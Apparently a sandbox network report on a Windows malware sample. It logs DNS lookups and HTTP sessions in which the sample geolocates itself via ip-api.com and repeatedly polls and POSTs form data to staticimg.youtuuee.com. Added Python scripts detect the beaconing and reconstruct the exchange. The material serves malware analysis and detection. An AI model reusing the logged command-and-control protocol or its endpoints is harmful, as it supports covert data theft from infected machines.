Oct 24, 2021 09:47:48.618808985 CEST  8.8.8.8  192.168.2.5  0x360d  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:49.225338936 CEST  8.8.8.8  192.168.2.5  0x911c  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:49.817647934 CEST  8.8.8.8  192.168.2.5  0xfd3  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:50.428714991 CEST  8.8.8.8  192.168.2.5  0xe416  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:51.059173107 CEST  8.8.8.8  192.168.2.5  0xecad  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:51.661578894 CEST  8.8.8.8  192.168.2.5  0x5b5  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:52.275777102 CEST  8.8.8.8  192.168.2.5  0x36f  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:52.893830061 CEST  8.8.8.8  192.168.2.5  0x68de  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:53.489969015 CEST  8.8.8.8  192.168.2.5  0xf293  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)


Oct 24, 2021 09:47:54.106935024 CEST  8.8.8.8  192.168.2.5  0x69a3  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:54.737811089 CEST  8.8.8.8  192.168.2.5  0x4eac  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:55.344943047 CEST  8.8.8.8  192.168.2.5  0xe83f  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:55.972354889 CEST  8.8.8.8  192.168.2.5  0xcc66  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:56.577006102 CEST  8.8.8.8  192.168.2.5  0xb24f  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:57.207375050 CEST  8.8.8.8  192.168.2.5  0xff  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:57.836489916 CEST  8.8.8.8  192.168.2.5  0xdca  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:58.454911947 CEST  8.8.8.8  192.168.2.5  0xcdaa  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:59.077966928 CEST  8.8.8.8  192.168.2.5  0x6f1c  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:47:59.675107002 CEST  8.8.8.8  192.168.2.5  0xcd41  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:48:00.280102015 CEST  8.8.8.8  192.168.2.5  0x7608  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:48:00.895539045 CEST  8.8.8.8  192.168.2.5  0x825b  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:48:01.503696918 CEST  8.8.8.8  192.168.2.5  0xcc3a  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)
Oct 24, 2021 09:48:02.130254984 CEST  8.8.8.8  192.168.2.5  0x95a  No error (0)  staticimg.youtuuee.com  45.136.151.102  A (IP address)  IN (0x0001)

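The DNS answers above show the sample resolving staticimg.youtuuee.com over and over, at intervals of roughly 0.6 to 1.7 s, each time with a fresh transaction ID and always getting 45.136.151.102 back: one lookup per connection rather than a cached answer, which is the polling loop behind the HTTP sessions that follow. The script below is an added example (not part of the Joe Sandbox report and not the sample's code) that parses rows in the layout of this table and flags names re-resolved at a short, regular cadence. The staticimg.youtuuee.com rows are copied from the table; the single ip-api.com row (its timestamp and transaction ID are made up, 208.95.112.1 is the address session 0 below connects to), the fixed CEST zone and the thresholds in flag_beacons are assumptions, and rows carrying a CNAME would need an extra column.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# One record per line in the report's DNS answers layout: timestamp, resolver,
# client, transaction ID, reply code, queried name, answer, record type, class.
# The staticimg.youtuuee.com rows are copied from the report; the ip-api.com
# row is constructed for contrast (made-up timestamp and transaction ID).
DNS_ANSWER_LINES = """\
Oct 24, 2021 09:46:11.900000000 CEST 8.8.8.8 192.168.2.5 0x1a2b No error (0) ip-api.com 208.95.112.1 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:43.150230885 CEST 8.8.8.8 192.168.2.5 0x493e No error (0) staticimg.youtuuee.com 45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:43.770291090 CEST 8.8.8.8 192.168.2.5 0x37a8 No error (0) staticimg.youtuuee.com 45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:44.410131931 CEST 8.8.8.8 192.168.2.5 0x449d No error (0) staticimg.youtuuee.com 45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:45.035528898 CEST 8.8.8.8 192.168.2.5 0xc73e No error (0) staticimg.youtuuee.com 45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:45.675551891 CEST 8.8.8.8 192.168.2.5 0x9934 No error (0) staticimg.youtuuee.com 45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:46.313957930 CEST 8.8.8.8 192.168.2.5 0xb8ed No error (0) staticimg.youtuuee.com 45.136.151.102 A (IP address) IN (0x0001)
"""

# Assumes the report's fixed CEST zone and no CNAME column (true for every row above).
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) CEST\s+"
    r"(?P<resolver>[\d.]+)\s+(?P<client>[\d.]+)\s+(?P<txid>0x[0-9a-fA-F]+)\s+"
    r"(?P<rcode>.+?\(\d+\))\s+(?P<name>\S+)\s+(?P<answer>[\d.]+)\s+"
    r"(?P<rtype>\S+ \([^)]*\))\s+(?P<rclass>\S+ \(0x[0-9a-fA-F]+\))$"
)


def parse_timestamp(ts: str) -> datetime:
    """The report prints nanoseconds; strptime's %f accepts at most six digits."""
    base, frac = ts.split(".")
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(text: str) -> list:
    """Parse every line that matches the table layout; silently skip the rest."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["ts"] = parse_timestamp(row["ts"])
            rows.append(row)
    return rows


def lookup_stats(rows: list) -> dict:
    """Per queried name: lookup count, distinct answers/transaction IDs and inter-lookup timing."""
    by_name = defaultdict(list)
    for r in rows:
        by_name[r["name"]].append(r)
    stats = {}
    for name, rs in by_name.items():
        rs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rs, rs[1:])]
        stats[name] = {
            "count": len(rs),
            "answers": sorted({r["answer"] for r in rs}),
            "distinct_txids": len({r["txid"] for r in rs}),
            "median_gap_s": statistics.median(gaps) if gaps else None,
            "gap_spread_s": (max(gaps) - min(gaps)) if gaps else None,
        }
    return stats


def flag_beacons(stats: dict, min_count: int = 5,
                 max_median_gap_s: float = 5.0, max_spread_s: float = 2.0) -> list:
    """Names re-resolved many times at a short, regular interval.
    The thresholds are assumptions chosen for this sample; baseline them per environment."""
    return sorted(
        name for name, s in stats.items()
        if s["count"] >= min_count
        and s["median_gap_s"] is not None
        and s["median_gap_s"] <= max_median_gap_s
        and s["gap_spread_s"] <= max_spread_s
    )


if __name__ == "__main__":
    stats = lookup_stats(parse_rows(DNS_ANSWER_LINES))
    for name in flag_beacons(stats):
        s = stats[name]
        print(f"{name}: {s['count']} lookups, median gap {s['median_gap_s']:.3f}s, answers {s['answers']}")
```

On the six copied rows the median gap is about 0.64 s with a spread under 0.02 s, so staticimg.youtuuee.com is flagged while the lone ip-api.com lookup is not. In production the same logic runs over the resolver's query log rather than a sandbox table; what makes it robust is the regularity of the interval and the fresh transaction ID per query, not the absolute rate, since a legitimate client honouring the record TTL would not re-ask the resolver at all within that window.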

HTTP Request Dependency Graph

ip-api.com
staticimg.youtuuee.com

HTTP Packets

Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
0  192.168.2.5  49735  208.95.112.1  80  C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:12.018076897 CEST  649  OUT
GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com

Oct 24, 2021 09:46:12.047775030 CEST  690  IN
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 07:46:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 294
Access-Control-Allow-Origin: *
X-Ttl: 53
X-Rl: 42
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 31 22 2c 22 6c 61 74 22 3a 34 37 2e 31 39 33 37 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 32 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6331","lat":47.1937,"lon":8.4202,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.33"}


Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
1  192.168.2.5  49740  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:12.621711016 CEST  808  OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:12.769849062 CEST  946  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 4b 44 41 7a 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2149215,"time":1635061572,"rand_str":"FhKDAz"}0

Oct 24, 2021 09:46:12.923156023 CEST  1149  OUT
POST /api/?sid=2149215&key=bd3cb4debade8ca1e0a19fe2ed18b376 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:13.082741976 CEST  1150  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 32 32 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 2c 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 22{"status":2,"ip":"102.129.143.33"}0

Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
10  192.168.2.5  49758  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:24.059860945 CEST  1341  OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:24.206494093 CEST  1341  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 37 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 33 32 67 46 6d 55 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2149773,"time":1635061584,"rand_str":"32gFmU"}0

Oct 24, 2021 09:46:24.325861931 CEST  1342  OUT
POST /api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:24.523351908 CEST  1342  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0


Sessions 100 to 109 (the report lists no HTTP packets for these connections):

Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
100  192.168.2.5  49888  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
101  192.168.2.5  49889  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
102  192.168.2.5  49890  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
103  192.168.2.5  49891  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
104  192.168.2.5  49892  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
105  192.168.2.5  49893  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
106  192.168.2.5  49894  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
107  192.168.2.5  49895  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
108  192.168.2.5  49896  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
109  192.168.2.5  49897  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe

Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
11  192.168.2.5  49760  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:25.600858927 CEST  1343  OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:25.747248888 CEST  1344  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 38 34 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 41 77 4a 45 50 6e 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2149847,"time":1635061585,"rand_str":"AwJEPn"}0

Oct 24, 2021 09:46:25.915107965 CEST  1344  OUT
POST /api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:26.070641041 CEST  1345  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Sessions 110 to 119 (the report lists no HTTP packets for these connections):

Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
110  192.168.2.5  49898  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
111  192.168.2.5  49899  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
112  192.168.2.5  49900  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
113  192.168.2.5  49901  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
114  192.168.2.5  49902  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
115  192.168.2.5  49903  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
116  192.168.2.5  49904  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
117  192.168.2.5  49905  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
118  192.168.2.5  49906  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe
119  192.168.2.5  49907  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe

Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
12  192.168.2.5  49763  45.136.151.102  80  C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:27.121689081 CEST  1351  OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:27.268641949 CEST  1354  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 39 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 38 46 47 56 70 59 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2149915,"time":1635061587,"rand_str":"8FGVpY"}0

Oct 24, 2021 09:46:27.453737020 CEST  1355  OUT
POST /api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:27.604629040 CEST  1355  IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0
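Sessions 1, 10, 11 and 12 all carry the same two-step exchange with staticimg.youtuuee.com: GET /api/fbtime returns a chunked JSON body with sid, time and rand_str, and the sample immediately POSTs 289 bytes of form data (not shown in the report) to /api/?sid=<that sid>&key=<32 hex characters>, getting back {"status":2,"ip":"102.129.143.33"} the first time and {"status":3} on every later session. The Python below is an added example, not code from the report or from the sample, that rebuilds that exchange from the report's own Data Raw hex: it de-chunks the bodies, checks that the POST echoes the sid it was just issued, tests whether the key has the shape of an MD5 digest (a shape check only; the report does not show how the key is derived), and converts the server's time field to UTC so it can be compared with the Date header on the same response. The two sessions embedded are copied from the report; the field names in the returned dictionaries are my own.

```python
import json
import re
from datetime import datetime, timezone
from urllib.parse import parse_qsl, urlsplit

# Constructed from the report's HTTP packet log (sessions 1 and 10). The
# "*_raw" strings are the Data Raw hex dumps the report prints for each
# chunked response body; the request lines are copied verbatim.
SESSIONS = [
    {
        "session": 1,
        "fbtime_request": "GET /api/fbtime HTTP/1.1",
        "fbtime_raw": "33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 4b 44 41 7a 22 7d 0d 0a 30 0d 0a 0d 0a",
        "post_request": "POST /api/?sid=2149215&key=bd3cb4debade8ca1e0a19fe2ed18b376 HTTP/1.1",
        "post_raw": "32 32 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 2c 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d 0d 0a 30 0d 0a 0d 0a",
    },
    {
        "session": 10,
        "fbtime_request": "GET /api/fbtime HTTP/1.1",
        "fbtime_raw": "33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 37 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 33 32 67 46 6d 55 22 7d 0d 0a 30 0d 0a 0d 0a",
        "post_request": "POST /api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 HTTP/1.1",
        "post_raw": "63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a",
    },
]

MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$")


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        # A chunk-size line may carry ";ext=..." extensions; only the size matters.
        size = int(raw[pos:end].split(b";")[0].decode("ascii"), 16)
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


def body_json(hex_dump: str) -> dict:
    """Decode a report 'Data Raw' hex dump, de-chunk it and parse the JSON inside."""
    return json.loads(dechunk(bytes.fromhex(hex_dump)).decode("utf-8"))


def parse_request_line(line: str):
    """Split 'METHOD /path?query HTTP/1.1' into method, path and query parameters."""
    method, target, _version = line.split(" ", 2)
    url = urlsplit(target)
    return method, url.path, dict(parse_qsl(url.query))


def reconstruct(session: dict) -> dict:
    """Pair one fbtime reply with the POST that follows it and summarise the exchange."""
    fbtime = body_json(session["fbtime_raw"])
    method, path, params = parse_request_line(session["post_request"])
    reply = body_json(session["post_raw"])
    key = params.get("key", "")
    return {
        "session": session["session"],
        "sid": fbtime["sid"],
        "rand_str": fbtime["rand_str"],
        # Server-issued epoch seconds; comparable with the Date header in the log.
        "server_time_utc": datetime.fromtimestamp(fbtime["time"], tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "post": f"{method} {path}",
        "sid_echoed": params.get("sid") == str(fbtime["sid"]),
        "key": key,
        "key_is_md5_shaped": bool(MD5_HEX_RE.match(key)),
        "status": reply.get("status"),
        "reported_ip": reply.get("ip"),  # only present in the first (status 2) reply
    }


def reconstruct_all(sessions=SESSIONS) -> list:
    return [reconstruct(s) for s in sessions]


if __name__ == "__main__":
    for row in reconstruct_all():
        print(row)
```

Both server time fields decode to the second shown in the response's Date header (07:46:12 and 07:46:24 GMT), so the sid, time and rand_str triple is server-generated per session and the client's key changes with it; an IDS rule keyed on the literal key value would therefore never fire twice, whereas the stable parts of the exchange (the /api/fbtime path, a POST to /api/ with sid= and a 32-hex key= in the query string, and the Content-Length of 289) are what to match on.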

Session ID Source IP Source Port Destination IP Destination Port Process

120 192.168.2.5 49908 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

121 192.168.2.5 49909 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

122 192.168.2.5 49910 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

123 192.168.2.5 49911 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

124 192.168.2.5 49912 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

125 192.168.2.5 49913 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

126 192.168.2.5 49914 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

127 192.168.2.5 49916 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

128 192.168.2.5 49917 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

129 192.168.2.5 49918 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

13 192.168.2.5 49765 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:28.760766983 CEST
1356 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:28.905373096 CEST
1357 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
